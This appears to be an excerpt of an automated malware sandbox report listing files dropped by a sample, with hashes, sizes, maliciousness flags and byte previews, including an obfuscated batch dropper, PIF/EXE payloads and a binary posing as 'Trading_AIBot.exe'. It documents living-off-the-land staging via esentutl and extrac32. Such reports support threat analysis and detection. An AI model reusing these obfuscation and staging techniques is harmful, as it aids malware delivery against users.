                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2386716
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.750563994554051
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:y4lGgAK/eHLG7HcOEPQW1LM9Cwyq7uP6yIFBlZ:ppAqyGTE1o9PPyOBlZ
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:5E9E591803218A9803C8F7B2C63DD663
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:8711875A288EBD187AFFE45CD31EC8E55D05FDB1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:BD53A567B8ED172FE46F5396276B2FA285CB9FCE1748411EB42960833CBC9A93
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:407B99B5AA46998EECCEED92484C0BDFE86EF56FA9AB1BAC83F13B3615EF1CCC898B0DEEC6A02F1659637B6723AE474781955E7A5EB8B28450210C734BE4503E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:...Y#..K..... .$..!.!'&..&.......%..... ........ %.....Y#..KU"..!.&..&&...Y#..K^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyr.Rh-kca.e_p.f.law9wkv`.bvms.k\{{._g<Qp).9j8....l+.5a..Gw..5^..@.3\^T....7ct[.h.....yr...d..Y.7^r..4.v.\*

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Public\Libraries\Juqmtmya.PIF

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1239552
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.46367308768617
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:8sqCMKzL0rxr152qsNa6HR2zlPQxL/F99UljJes8lSnQ:85KMXANYOLSes8lSQ
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:E02910D2D83F40FAEF8719A99EE0EF5B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:49F932B32703D21B2041F36829D87353E64AE685
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:326A9344D8D5CE3E59D1C8560043D4EBD87BA53B732B635FAB2D8AFA210C5C05
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:A55D2321FE633CAE781B5868763C9F778B3413D24AA0C83A99BD4E12BD489EC2CBAC3BCA1FEA04A8233A542FBF609B33DB697E32180D3948DEDA723B096F60B2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..............................................@...............................$...........................P..dk...........................@.......................................................text...h........................... ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata...$.......&..................@....tls....4....0...........................rdata.......@......................@..@.reloc..dk...P...l..................@..B.rsrc................8..............@..@....................................@..@................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Public\Libraries\PNO

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:g:g
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:F94A11466C734C23D4C8C0BE47CC23DF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:67D8A85565AA87598B48AA5B9E7849F75035B5C6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:9E4C59BB9E5CA6CA840EB57555C3F45692474FF6C1379D3579EEC60E18667CBE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:105758DBA8D8EA0663AD1A67545719B689A354CBFA396447D84F82890EFC3523B4D15A8E6EED1D6B48FC33EA1C1A3BFF5BCEB2EA1E47A51D9A32765902028C50
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:42..

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Public\Libraries\aymtmquJ.cmd

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):62357
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.705712327109906
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Public\Libraries\aymtmquJ.pif

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):68096
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.328046551801531
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Public\alpha.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):289792
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.135598950357573
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Public\alpha.pif

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):236544
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.4416694948877025
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Public\kn.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1651712
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.144018815244304
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Public\xpha.pif

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):18944
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.742964649637377
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Trading_AIBot.exe.log

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):410
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2232
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.379460230152629
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:4DC84D28CF28EAE82806A5390E5721C8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:66B6385EB104A782AD3737F2C302DEC0231ADEA2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1425408
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.680690579464684
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:Zk70Trcosu4CTPpR9+aHsqjnhMgeiCl7G0nehbGZpbD:ZkQTAW5v+ADmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:51A2DCBBA6BCBB069A3A5AB77659D46E98B02289
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:A7BA9EAC2A255CAB335D7B0D00DA00C962E2BECC8AEBF313434E861C502D5DD9
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:E3CB79FB953D247C98B06E64EFE737D53EB57233B43B4FD2A637EBD0F5C9FF088ADCAF4CFFC095AA6A6CE7B87F4B9812D1D8B76A0D27BBBBB4955FA57260ADB7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................0y.f....PE..L...t..P..........#................./.............@.................................J...........................................P....`..pg..............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):70656
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.910353963160109
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tulgxrp.msf.psm1

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
